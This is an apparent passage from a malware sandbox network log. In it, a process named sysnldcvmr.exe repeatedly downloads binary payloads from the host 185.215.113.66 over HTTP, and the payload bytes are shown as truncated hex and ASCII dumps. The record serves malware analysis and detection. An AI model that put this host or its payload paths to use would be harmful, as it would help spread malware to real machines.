Dec 5, 2024 17:33:00.283107996 CET	124	IN	Data Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96 Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>
Dec 5, 2024 17:33:00.284604073 CET	1236	IN	Data Raw: 2a a9 81 d6 fd 42 20 61 77 b3 e1 96 27 26 69 a5 a5 fd 12 45 e7 70 8e 52 61 02 17 bc a9 fa 4d a1 ea eb 5a fb ad a9 7c e3 d6 09 c7 bf 33 87 46 cc 6b 3c ed 6c d3 51 3b fe c7 be d3 12 b7 d8 47 62 86 b4 a5 12 50 1b 06 4d 8c ed 6c 18 68 d3 b2 17 e9 35 Data Ascii: *B aw'&iEpRaMZ\|3Fk<lQ;GbPMlh5}8m;ajW,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7\|VbF9?gk{is6u_pi!
Dec 5, 2024 17:33:00.284683943 CET	1236	IN	Data Raw: 4b dc 75 22 a9 31 18 da 58 da 9c 5b 38 49 62 0f b2 64 bd f8 00 b5 79 6d 2d 2a c5 7c 0a c5 a7 e9 1e a3 fd 06 2b 0f de a6 3e 61 08 18 aa 60 84 ce 3c fb 5a cc 21 25 12 f9 d9 17 a6 7c 20 a2 34 26 b5 80 dc bc 1c fc 99 e4 5b 2b d1 75 73 4c 5e a1 c3 65 Data Ascii: Ku"1X[8Ibdym-*\|+>a`<Z!%\| 4&[+usL^etpuu);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E98k-
Dec 5, 2024 17:33:00.284697056 CET	1236	IN	Data Raw: 0b 3e 1f 18 b4 22 57 d9 8b 7c 31 98 16 87 ae e9 52 72 6d 5d c2 16 1d 54 31 c6 26 50 53 c5 b3 54 51 99 ab e5 bf ce ab 5a 8a 71 45 74 67 a4 63 0c 5b 55 2a 2c 09 40 f8 fc e9 05 9a 85 93 2b 1f c2 e7 ee b8 e5 f1 4c c2 16 6f c2 52 95 cb 30 72 4d 77 66 Data Ascii: >"W\|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;Bni,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh['3(@
Dec 5, 2024 17:33:00.284739971 CET	372	IN	Data Raw: 31 a8 75 b5 61 82 75 bf 07 d4 ae 95 c4 56 90 7c cb 70 96 18 0f 8d 94 0d ed c5 38 19 fb 22 c5 0b 12 87 60 3b 81 03 12 75 54 3b 9d 5f 49 0f c9 02 17 62 6d e2 fe bb 70 70 d5 80 63 88 df db 26 ba b5 f0 ea 96 e1 99 44 8e de e9 03 08 35 cb 48 83 ae 43 Data Ascii: 1uauV\|p8"`;uT;_Ibmppc&D5HCwjrH&532a`#&AWxd<,v\]Hhq"4kW'{wR4BA=g-S*M^~lv^b%\Z)zW0EZSM#x6Y=z)}s
Dec 5, 2024 17:33:00.285693884 CET	1236	IN	Data Raw: 97 93 05 44 ff df 37 26 13 b8 c0 69 cd d0 4d e7 a8 07 3a c0 b4 91 f1 c8 d0 9a 5f ec 8d 18 a9 e0 47 12 48 80 6b aa 97 64 8d 2a 55 44 06 66 4d b6 76 18 07 89 4a 5f bd 06 01 12 3b 50 b8 6b c2 df 39 e9 6e 6a 0e 54 e9 3a e6 ad 8c 84 c4 53 3b 37 aa 96 Data Ascii: D7&iM:_GHkd*UDfMvJ_;Pk9njT:S;7#B0;s9MxF!o-0.Iq&q"Ka4tO>]=7PpVra;AyN<.O~`=]/1JEsW`T`D@);q5'Q
Dec 5, 2024 17:33:00.285747051 CET	1236	IN	Data Raw: 07 3e 88 72 f1 4a fa 21 3b fb e2 1e 9e 3d 7f 77 4a 6f 8a 09 14 20 4f f5 68 09 fe f2 df 7a 11 bb 4f 3d 71 06 dc a1 7e 71 d3 e9 46 df a7 e2 b2 f8 f7 9e 2e 89 c8 ed 8a 84 42 74 68 df e8 5d 51 81 a6 0d 4c 3e e9 bd ed af 75 87 f1 d2 86 41 08 5a bd 13 Data Ascii: >rJ!;=wJo OhzO=q~qF.Bth]QL>uAZ Zva"HIbKdPSmy"Y9o3QBqYV#Vr8C7ClU8.* /;7(^ZSH>3b\hljGkcy`L@&C
Dec 5, 2024 17:33:00.285758018 CET	248	IN	Data Raw: 72 d1 c2 ba 68 f3 74 f6 c7 76 f4 e9 47 ea d4 1f d2 e2 2e 77 47 36 12 b0 6e 3d 2d c0 7a 09 e7 50 4b 2c 2c 6a 68 4d 92 ba 96 02 0e 52 44 20 bc 59 69 3d 38 9f 97 53 37 3d 11 d3 33 c3 a0 fd 52 9d e0 e8 5d ff 13 54 77 b3 5a a1 57 39 5e f2 c4 9d 68 78 Data Ascii: rhtvG.wG6n=-zPK,,jhMRD Yi=8S7=3R]TwZW9^hx``\vkU&lJuGoexF*-~Q;Y0oqb=gP/-SeccZ?m_=UVT
Dec 5, 2024 17:33:00.286973000 CET	1236	IN	Data Raw: 4d a1 d1 e7 27 05 b8 8e f4 9c 1d 95 99 e5 8c 61 b1 b2 98 8a 81 a4 59 8b c9 9a 08 ef 09 76 5f 8c fe 80 e6 77 ad 80 e9 26 d8 25 be 6b 87 19 22 2d 20 31 3f 33 75 6c a2 eb 32 ef 27 a4 4b 17 75 f1 73 04 32 85 17 e7 0f 29 03 a0 ea 5e 80 10 89 58 f6 ff Data Ascii: M'aYv_w&%k"- 1?3ul2'Kus2)^XCO"N"^E]zgh[!nlIonB1jg'\|]w<OyfG%Wl'X2c _'v^]XtCP8&S*.OU@:`#45/
Dec 5, 2024 17:33:00.404052973 CET	1236	IN	Data Raw: 6c 2b 0e 37 89 41 c1 51 1a 35 4a 27 0e 75 79 5e 19 ed a2 b8 58 ee 3d f8 ed 0a 54 b2 c3 da e0 3f a6 32 68 dd 96 90 56 1c 08 09 b7 0e 67 b7 90 96 70 6b 2c ef ea 20 91 ff ad 1b 52 5e 43 96 21 a5 a9 ad 6f b4 9f 4f f5 dc 13 8e cc f2 ed c9 2e d5 e0 5e Data Ascii: l+7AQ5J'uy^X=T?2hVgpk, R^C!oO.^;G@ ;/0#1myu)pLl!LugJ:hL"@hNUoZwAFiA;O"GaTP;\|6z:A78jGr\|OXvf~ZCen.+B];k

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.11	49922	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:33:03.059560061 CET	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:33:04.389373064 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:33:04 GMT Content-Type: application/octet-stream Content-Length: 55040 Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT Connection: keep-alive ETag: "674b357a-d700" Accept-Ranges: bytes Data Raw: 71 55 bf 68 00 78 5e 05 bf 77 f1 ce 6a 84 34 af 59 54 f4 9a 7f 2e 9e 56 5c 9f 90 cf 88 27 49 60 23 c8 18 58 ef 00 f5 4c be 7d 1c 91 c4 34 02 a2 5c 3c 0d 4e 55 81 f8 05 ac ee cb 01 3b 46 d2 9c 58 e4 0f 57 22 b2 cd 6b b7 cc 33 3f be b9 da e2 c1 f2 64 fc e6 50 f4 9a 92 a5 f5 09 a8 09 a7 c7 da 31 7d 87 96 31 55 a4 1a d0 ba a1 26 ba b8 99 69 1d 33 dc 14 0f 1c 89 01 e6 63 3c 95 aa 53 61 58 04 03 e1 40 77 fb 5f 23 b2 e6 ef 48 bb 0d da b9 71 4f 5c 1b bf 2d 19 31 22 20 7c 90 25 4c a9 42 7c 7d b5 72 c6 73 d7 e6 e2 bc c8 de e2 46 c0 f0 c7 86 98 ef 5b b4 36 d4 af 0f dd d9 cf 96 3a ae 7e 9f c1 2c 54 45 11 30 e9 3e f6 a0 0c 58 a7 ed 3c 7a d4 d4 8e 7e fd 5d 2c a2 dc 17 0f 69 98 fe 29 2d 23 fc 4f a1 61 fb e3 d4 f3 0f 4b b1 33 49 91 45 9f 62 e1 a2 13 f5 5c 5d 8f c4 f6 8b c7 30 c5 0b 16 f6 6f f6 71 a2 69 a7 be c7 a0 ad 0c 22 4b 33 e3 10 dd f4 ad 9d c9 f9 ba 6b 9d 18 b7 b7 99 bf f8 3e bf 51 8f e7 79 e1 e2 02 f7 6b a1 21 e1 93 c9 31 90 95 64 be 3c 55 a3 bc b1 6e 93 47 c8 b4 34 76 3f 40 1c 6f b5 f6 6f e2 0a a6 f3 70 3f [TRUNCATED] Data Ascii: qUhx^wj4YT.V\'I`#XL}4\<NU;FXW"k3?dP1}1U&i3c<SaX@w_#HqO\-1" \|%LB\|}rsF[6:~,TE0>X<z~],i)-#OaK3IEb\]0oqi"K3k>Qyk!1d<UnG4v?@oop?t Q@>VeGy6-:p~w!:zq<\|TwX?Fq)3Pr\|\jFC4wa\|zk9eTG$IFxP!+(Wjv2G6;axnMd<?IA0![eLQ'Ju$%6b$V"2yvRKbPUH!@uQ+Zp,j%nf]k1'+\|~z0g[:e2?zO_X8IhveZ9:iOSgly{`bx6R-bHWhgF[oDzz68lty<}Du56T;,{stYZL1"!hJy^cqVNWAy<I7fo-)m/$f55KqQchAZM,v@O$j ^t)%BlCWv[ZBO8:L=-
Dec 5, 2024 17:33:04.389764071 CET	124	IN	Data Raw: 5b 45 cd 42 00 1c 84 28 01 50 de 3b 22 91 56 cf e9 a7 2b 5b f3 ba d0 65 3e d9 cc 07 bf 4f ee 6c a9 19 5b ee bb 28 49 cc e1 f2 28 87 3c e0 d7 ff a4 0a 34 6f 49 d4 2a 8b a8 f8 bc 1a 35 e9 59 59 81 c3 15 fd 6e cb be 09 bb e1 99 dc e7 12 87 9c 23 b5 Data Ascii: [EB(P;"V+[e>Ol[(I(<4oI*5YYn#XGqenlH=F<S["z{{"
Dec 5, 2024 17:33:04.390101910 CET	1236	IN	Data Raw: 6c fe cd 45 55 b9 8c 37 fb e0 65 e2 c7 a6 e8 ca 2e e7 36 11 cb 44 07 75 cb 65 86 30 68 e9 80 ff a2 f2 50 8d 9f ef f0 d7 88 1a 9c d0 44 c8 07 20 87 df eb 5f aa 42 af 74 3b f3 0f c4 18 25 80 2a b4 f7 48 e6 5f 1a db a2 ab 62 43 40 ea 39 f6 86 e6 0a Data Ascii: lEU7e.6Due0hPD _Bt;%*H_bC@97U8,/&U5Ck]ocRO3hW\|Sz#0#\|)8_wo=`w9rvM$&qfkc];j`PWbOxH2me7q-kAqD_Pk
Dec 5, 2024 17:33:04.390147924 CET	1236	IN	Data Raw: 7b 36 a6 49 ac 18 96 02 5c 26 ff 36 f8 c6 2f da 11 03 0b 43 42 d5 f1 fa 41 49 12 5f 6a f7 0d ab 9c 22 da 0e e6 73 5c a7 63 55 c5 7a be 68 9a 7b ab 24 23 8f b8 90 f1 46 3f dc 40 7f eb fc ff f9 de 79 f0 46 f0 1c bf c3 28 8f 7e 59 df 83 6b 13 f2 9e Data Ascii: {6I\&6/CBAI_j"s\cUzh{$#F?@yF(~YkV.3T#\|;d!q?+y<ptwL(>qvj?}Ip9f&)ta/kkPSHD+$"S$>p\"}q@&}X~{4SSz99)T
Dec 5, 2024 17:33:04.390157938 CET	248	IN	Data Raw: 7b c2 28 ec 12 68 73 af f0 35 fa 92 0d 6e d3 4c 18 d1 e8 8f c4 a1 15 0c 44 f9 b6 78 31 a0 fd 7f 79 99 72 c6 f0 73 47 e9 0f 40 94 99 fb e1 f0 b4 d5 8f 6d d3 2c 32 8b 19 0f 58 f0 2e 41 9c f2 6f 5b 46 89 a3 28 dc 95 c6 72 a2 e2 61 ac 48 43 c4 a9 bc Data Ascii: {(hs5nLDx1yrsG@m,2X.Ao[F(raHC&i/r"j4izzA9cLWIt_h+nLh-=-&vqSO@O<0gm:TtwnKmhmm@A>xa!@ZcI:#u
Dec 5, 2024 17:33:04.390888929 CET	1236	IN	Data Raw: 19 a0 24 4b da 1e 29 2e b8 90 9c 19 04 be a0 c4 89 13 1c 0f aa 93 20 f3 19 9e b4 84 fb e1 14 78 a7 00 52 e2 02 4c b2 23 82 28 ac f5 b8 d9 a2 cf 34 a1 59 dc ee fd 95 3e 18 9b 64 03 51 58 ab bf d0 e1 e3 e5 36 f2 4d fe 5c 19 c0 e8 22 65 10 8a 26 7e Data Ascii: $K). xRL#(4Y>dQX6M\"e&~,r7e>l=U-v"HPC\|)27gJ_nsZ'<!.xRt8HIDE1@P[lZ/\!A"7$yU?&
Dec 5, 2024 17:33:04.390949011 CET	1236	IN	Data Raw: e3 c7 0b d2 07 66 a2 02 df 9b c5 ad ab 86 33 77 7c 85 cf 8e 02 e9 ff 0a 52 b6 86 0a 21 68 f0 58 ca f5 19 d1 1f 7e eb d9 06 ec 62 12 90 c3 a8 07 cc ab 65 62 96 7c 42 a0 c7 96 0d 36 40 4f ee 7a 37 4c 55 60 da 2d 0c 43 d9 ee 18 23 31 42 c0 08 0f e1 Data Ascii: f3w\|R!hX~beb\|B6@Oz7LU`-C#1B13*8:X5PyaRb;6CXX-+X0{r7^M(:{w9Oz6k`m"q2T;auZOn.i^
Dec 5, 2024 17:33:04.390959024 CET	248	IN	Data Raw: 8b f1 53 ed 23 89 32 81 6a bd ac 31 f6 9e 1b 21 44 9f d0 ec 52 3c e7 1c f1 5f 27 92 ba 55 b5 ac 17 95 c8 e8 2a 81 72 92 e4 d3 9b 75 7a 3a 81 3a 47 c0 9d 6e d4 bb 70 d3 d3 62 2d fc c9 2d a8 43 c5 85 d8 06 4b 95 4d 8f 6a a5 64 23 d1 2f ec 3d 2b 2c Data Ascii: S#2j1!DR<_'Uruz::Gnpb--CKMjd#/=+,9D~GNR4:m{e13POt0:<E3 -zPqh_{,@K7IHJ<o:]v(-dCZ`p7(uiHd=)d3@<
Dec 5, 2024 17:33:04.392635107 CET	1236	IN	Data Raw: 17 43 81 f0 03 28 4e 24 a8 e2 3f 60 47 a1 6f 7b ec 56 d9 24 37 5a 16 c7 eb 35 dc 0e ed 65 da f8 49 f7 cc 2b 36 d8 0f 7d 66 42 a9 b8 85 ec bf 11 2a 77 a0 34 47 30 6f 7f 41 eb 96 c9 07 bc 08 47 23 99 e4 a4 6f f9 66 df 48 58 04 59 25 99 cb 97 2b f2 Data Ascii: C(N$?`Go{V$7Z5eI+6}fB*w4G0oAG#ofHXY%+CVFJq0`24NEEGWOI+3C^)^+KBSocNu\QlIj;vw(e7%3P8L97p,#0^4U[D.-Y
Dec 5, 2024 17:33:04.393243074 CET	1236	IN	Data Raw: 5a ac 51 67 01 3a 92 a1 ff f7 16 2a 46 98 21 45 9c 86 aa 78 86 b6 91 f2 e4 79 5a 79 6c ff b8 36 11 0d 46 b5 28 67 4f 17 25 c6 46 1d f0 6e a1 5f 5c 30 a3 52 df 5f d9 a2 ad 4a ff 0f 95 c9 36 8d bf 83 c5 bf c8 e5 47 08 f9 e3 09 7d 86 8c 8b 98 db 6f Data Ascii: ZQg:F!ExyZyl6F(gO%Fn_\0R_J6G}oJ&bBypG`6~!!S'?`?\i#Y%3xZT/qU^bIn/n}JGG-vam2T5a.v"[Fu#!D*
Dec 5, 2024 17:33:04.510375977 CET	1236	IN	Data Raw: 0f b3 d3 05 79 4d 7a a8 6e 58 5a 01 53 d0 02 cb c3 2b 86 63 b6 7f 83 2e eb 0d 93 a1 9d ed 03 12 e4 de 0b d4 1f da f1 2b 75 78 ac 0d d8 d3 d1 37 d3 d4 f5 3d b8 11 26 a3 c7 da 52 4d 50 d2 ae 12 55 a0 a6 f8 4b e6 c8 f4 f8 85 9b 93 57 cb 3a 31 c6 52 Data Ascii: yMznXZS+c.+ux7=&RMPUKW:1RuY[?@b DYSC^b`a85+N="p-1j'`G$hixmdkeym8)\|Sm*7Q%gDUw'P(+P{lC\q"b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.11	49933	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:33:06.690682888 CET	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:33:08.017703056 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:33:07 GMT Content-Type: application/octet-stream Content-Length: 63232 Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT Connection: keep-alive ETag: "67497f08-f700" Accept-Ranges: bytes Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED] Data Ascii: 3-;)VX\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t\|wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
Dec 5, 2024 17:33:08.017729044 CET	1236	IN	Data Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d Data Ascii: 1a@ #o;R`_\|#\|H%0SH9~`aa-1gH)2sLGnc <k[63N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz\|d
Dec 5, 2024 17:33:08.017740965 CET	1236	IN	Data Raw: 61 fd 3b da ac 5e 3b f8 33 7c 1b c1 0c 1d 56 7e 50 3f c2 fa 81 13 af aa 2f c8 95 e8 36 df 81 5c 66 94 8a f9 ce 98 df b2 af d9 e7 86 8b 86 8a 8e 12 bc 6e 99 34 38 be 43 e1 a8 a3 35 1f b8 c8 a9 9a 71 82 42 37 b8 af 12 3a 07 5a 08 52 88 6c 72 d8 5b Data Ascii: a;^;3\|V~P?/6\fn48C5qB7:ZRlr[X3V8+N[6s>FHj,tvb'*'\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]
Dec 5, 2024 17:33:08.017751932 CET	1236	IN	Data Raw: b3 14 96 cb 1c 0a 64 65 9f 17 1d 52 f9 ae 09 c2 59 f9 97 5b 06 44 1f 60 d5 dc 83 2e 98 cf df f1 08 5d 1d 36 10 63 69 37 f3 11 47 73 c1 1c ec 75 9f a3 5e 11 a4 d3 cd 83 6a 32 cd da 5f a2 80 b4 0b 03 1e 6e e5 80 35 9f 8f 49 86 b6 da c7 ab 4e 6a ba Data Ascii: deRY[D`.]6ci7Gsu^j2_n5INj.`/#(W{[uhRfdy6z[$PzqmAEH]6t:FvqlDFT\|JG9_,l{!G6eMqP_d
Dec 5, 2024 17:33:08.017764091 CET	1236	IN	Data Raw: 6d 0d 07 a8 a1 69 a5 5a 9f 67 bb a2 b3 a3 1a 7b df b0 97 3e 9f 20 d8 e2 0f 63 0c 38 c6 ce 9e b0 77 92 c6 65 37 7a e5 0d a5 58 6c cb b5 27 81 75 a6 c5 28 35 e5 3c c3 09 59 f7 dd 4d 9e 8b b5 64 6b e3 1f 4d ed 5b 6c 04 4e ae 54 c3 03 55 4a 4f 76 43 Data Ascii: miZg{> c8we7zXl'u(5<YMdkM[lNTUJOvCS\u#~z;}#+!%vk@E}rOFmbiVo(s<^]G,:\iLnc\.+#sE@-# ltx5=oPZr
Dec 5, 2024 17:33:08.017776012 CET	1236	IN	Data Raw: 84 db 0e 73 27 8c 8e 32 19 7c 5f 7e 88 3f 77 9c 60 1b 86 3c 63 9f 5e d3 41 d2 d9 8a 4f 95 24 1c 1e f6 60 45 bf 19 d6 10 06 4b 4f 78 8f 76 05 5c 04 08 0b 84 be cf a5 90 5a 2f 4a 86 44 4c 3e 8e f6 2d dc 92 b9 a0 5e 28 d2 50 08 ce 41 d5 da a6 0e 57 Data Ascii: s'2\|_~?w`<c^AO$`EKOxv\Z/JDL>-^(PAWS$0P"GgyUGdCj]}[`xT9/\^=}%1!lix7pwcdU"5glxDrcyzn#uZxT{4v
Dec 5, 2024 17:33:08.017855883 CET	1236	IN	Data Raw: eb 8d 97 ab 4b 3a 53 7e da 7f 04 57 bf 19 a7 d6 f3 c3 06 10 b1 09 16 23 60 a7 ba 91 3f 02 de a7 97 e6 74 56 05 8f f9 4f 69 36 6f 76 dd a5 19 ef 75 eb ae 69 3c 09 59 9b 3f 79 da 82 48 6d 9c d2 ba 97 99 83 d8 37 62 31 82 6a 57 5c 5e 54 5f 48 89 00 Data Ascii: K:S~W#`?tVOi6ovui<Y?yHm7b1jW\^T_H#^fdD`[wj(MEmClltf99az(2>&n+owX0}n)y]EfiH7,>H79;~#4{`M1H<%>^At
Dec 5, 2024 17:33:08.017869949 CET	1236	IN	Data Raw: 16 25 ae 88 64 71 0b 50 6d 5d 8c 63 a3 e9 91 25 1d aa 31 d9 aa 7a 7d 84 26 a2 95 76 45 23 54 e6 a5 ba c8 c4 c2 4f 36 d6 c9 45 2b a7 d0 b2 a6 b1 75 c4 a8 54 7d 9f da cf 6a dc 88 94 37 ff 38 1e b0 06 49 37 ed 2c 1a c5 bb 71 c3 2f 47 5a 84 9f a4 f8 Data Ascii: %dqPm]c%1z}&vE#TO6E+uT}j78I7,q/GZ`cr]c!E`qs7`.fg%yT_<Zi4V<NyDm}_Bh_3kSRUH\|[E("[(uOtR<HcbJ&xF'KH
Dec 5, 2024 17:33:08.017882109 CET	1236	IN	Data Raw: 20 a4 13 18 ef 97 b9 85 4c 87 0c 5e 0c 1a 67 ca 13 4f 06 00 22 3d e6 f5 8f b0 55 76 0f 6c 15 ae 5c 5c 57 5a 79 77 7d ed d9 96 48 e9 f1 39 38 66 67 ea f9 af 95 18 f7 5c 22 93 11 dc 4d 2d 2f 2c 66 ab 39 92 61 3d 01 75 ee 0b cb 04 d5 8c dd 42 4d 1a Data Ascii: L^gO"=Uvl\\WZyw}H98fg\"M-/,f9a=uBMd"=M,Lo1{@QXR:d=GMw(ZD}E?5GN2KsZf#_qGm8Y61Hc!nb&HskiT1L2Y\Z?w(Vg6FA.;r
Dec 5, 2024 17:33:08.017894983 CET	1236	IN	Data Raw: 82 ef 29 d7 83 57 67 67 d1 c1 72 17 81 4d c2 10 51 46 37 9f df 5d 5d c6 a6 e7 87 60 e1 21 98 20 70 0f 63 fc d6 a6 7f 00 d3 65 c6 9b f3 c6 71 fe 78 ec fb 00 0c 86 a7 25 8a 00 32 3a a6 1c 29 b2 89 d8 ac 37 4d 95 04 59 5c b1 46 e3 b1 2f aa d9 cc 11 Data Ascii: )WggrMQF7]]`! pceqx%2:)7MY\F/P!&mrDcbn0NWcD83Dkv\sLJ/ aU`\|RyzDyc#_T(^V71YtMazp{P^:w(ofe
Dec 5, 2024 17:33:08.138207912 CET	1236	IN	Data Raw: 7e 8d a9 13 7b ea ce ce 59 86 af da ff 6b ca 38 44 bc 32 9a 91 8c 1f 94 36 29 36 c7 1c d6 f8 74 96 7a 5a 96 7d 3b 68 4f 2c de 0e 1a c6 22 83 3c a8 7a 3e 73 40 5f 32 00 76 0a 3f 01 87 54 76 8c 6b 29 ff d0 63 38 3c 45 64 9f db 8f 2c 21 c7 a9 3d 40 Data Ascii: ~{Yk8D26)6tzZ};hO,"<z>s@_2v?Tvk)c8<Ed,!=@bV;?{!CxR\~DoP15"Na+=\|]K%=s74O-ADfix)I(LH9[`>n>Hr5X`hD!Or5REpHt 9CQ')}A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.11	49941	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:33:10.207612991 CET	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:33:11.535954952 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:33:11 GMT Content-Type: application/octet-stream Content-Length: 66816 Last-Modified: Thu, 05 Dec 2024 16:18:27 GMT Connection: keep-alive ETag: "6751d253-10500" Accept-Ranges: bytes Data Raw: 59 c8 13 50 1d f8 00 28 d4 3c 88 34 df 2b 4d 68 41 bc 72 70 ee 95 59 33 21 ac df a3 da 03 6e e1 9c 2f 7d c1 43 68 fd e7 23 38 43 6a 3b b3 0a 09 d6 00 18 a1 97 80 41 bb ee 53 60 95 b4 4b 94 36 fb 6b 23 f1 38 23 5f 5e b1 cc 57 ab e1 40 5f 96 22 6c 28 95 9b eb bc 8a 30 0f 9c d5 a9 d6 78 ae c9 24 73 55 19 2c 3f 43 87 88 19 3a e6 96 f8 ab a9 bb 9f 2a d3 90 bc 5e 4f 8f e3 37 56 8f d7 1c b4 67 1a 15 23 da 86 cd 87 6d f1 6d d3 9a c3 52 f8 c9 86 11 28 75 8e b0 49 f1 80 55 f8 20 01 99 bd 5e 01 23 f9 03 ba b4 ce 7e 70 67 36 02 f3 67 dc 6f 71 bc 54 48 14 d2 cb ec fd ff c1 5b f9 db 3f 73 54 b2 37 94 20 dc d2 62 83 57 4f 56 4a f2 d4 16 82 ea 1c 43 45 76 8b 93 95 d7 74 d2 53 86 f4 07 57 28 0a 98 f0 2e 4d 2d 61 c0 ac c8 eb 46 79 7d 6b 1b d4 aa e3 66 f9 df 88 7f 3e 1b 68 de 2b dc 80 f6 8b 14 02 0c 52 d8 eb 05 75 99 8f cf d1 31 5d 72 f6 c3 04 0f 22 6e 0a 4c 9d 6a db 4c 65 8b b0 dd cb c0 12 9a 0a aa cb 8c d6 09 0f 2e 59 fd 21 3b 06 72 63 2f d9 19 c7 6b fa 10 7b b9 44 cb f6 f8 f5 23 52 e0 c8 1a 00 16 71 b3 ab 8c e2 0c [TRUNCATED] Data Ascii: YP(<4+MhArpY3!n/}Ch#8Cj;AS`K6k#8#_^W@_"l(0x$sU,?C:^O7Vg#mmR(uIU ^#~pg6goqTH[?sT7 bWOVJCEvtSW(.M-aFy}kf>h+Ru1]r"nLjLe.Y!;rc/k{D#RqG}57= c#X7o/fU3RyFU<GTYRpL4d_a,r-E2//&-W&]+LK@6HlOcR$pZZQcp1;bIr^;~SJ,mWwijEX6o57_IcPmqf/F#u={7z/X59ThJ(pcMRjsrM4o^xSd\6i1>z*)mZCks-'kvV6?hQ^j-m+;<E)r034, =Rl@O#6P_asA\|?g}o k?Z5nD8E%\|QL>G \@ #3zaY[g0aGiG<E#oZR-j]O b\|S,Z?9C&]:jE>90F]qj(>rXn{v^e
